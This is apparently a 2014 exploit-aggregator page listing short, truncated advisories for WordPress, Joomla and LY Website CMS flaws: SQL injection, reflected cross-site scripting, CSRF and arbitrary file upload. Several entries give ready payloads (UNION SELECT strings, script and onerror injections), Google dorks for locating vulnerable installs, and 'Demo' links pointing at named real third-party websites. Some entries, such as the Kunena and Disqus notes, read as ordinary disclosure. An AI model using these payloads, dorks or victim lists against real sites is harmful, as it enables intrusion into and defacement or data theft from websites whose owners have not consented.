LY Website CMS SQL Injection

18 August 2014 - Source: http://www.mondounix.com
[+] Title: LY Website CMS Sql Injection vulnerability
[+] Date: 2014-08-15
[+] Author: Iran Security Group
[+] Vendor Homepage: http://www.lywebsite.com/
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /pro.php
[+] Dork : inurl:/pro.php?CateId=
           intext:"Power By LY Website"
### POC: http://site/pro.php?CateId=[sqli]
### Demo: http://www.bypipefittings.com/pro.php?CateId=20%27
          http://www.top1rc.com/pro.php?CateId=150%27
### Credits:
[+] Special Thanks: Root SmasheR, Hekt0r, Mr.Moein,Umpire, ALIREZA_PROMIS
                    Social Engineer, Ali Ahmady, Saeed.Jok3r,M4hdi
                    Vahid Hacker, BlackErroR, Phantom.S3c
                    And All members of Iran Security Group
[+]...

Read more »

WordPress 2.77 CSRF

17 August 2014 - Source: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/

...

Read more »

WordPress MyBand Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Read more »

WordPress Gamespeed Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Read more »

WordPress SI CAPTCHA Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork: inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Read more »

WordPress GB Gallery Slideshow 1.5 SQL Injection

14 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...

Read more »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 August 2014 - Source: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Read more »

WordPress WPSS 0.62 Cross Site Scripting

7 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*] [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

Read more »

WordPress WPSS 0.62 SQL Injection

7 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*] [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...

Read more »

Joomla Kunena Forum 3.0.5 Cross Site Scripting

4 August 2014 - Source: http://www.mondounix.com
Kunena forum extension for Joomla multiple reflected cross-site scripting vulnerabilities
 
Class:      Input Validation Error
CVE      N/A
Remote      Yes
Local      No
Published    02/07/2014
 
Credit      Raymond Rizk of Dionach (vulns@dionach.com)
Vendor      Kunena
Vulnerable    Kunena v3.0.5
Solution Status:  Fixed by Vendor
 
Kunena Forum is prone to multiple reflected cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
 
Kunena...

Read more »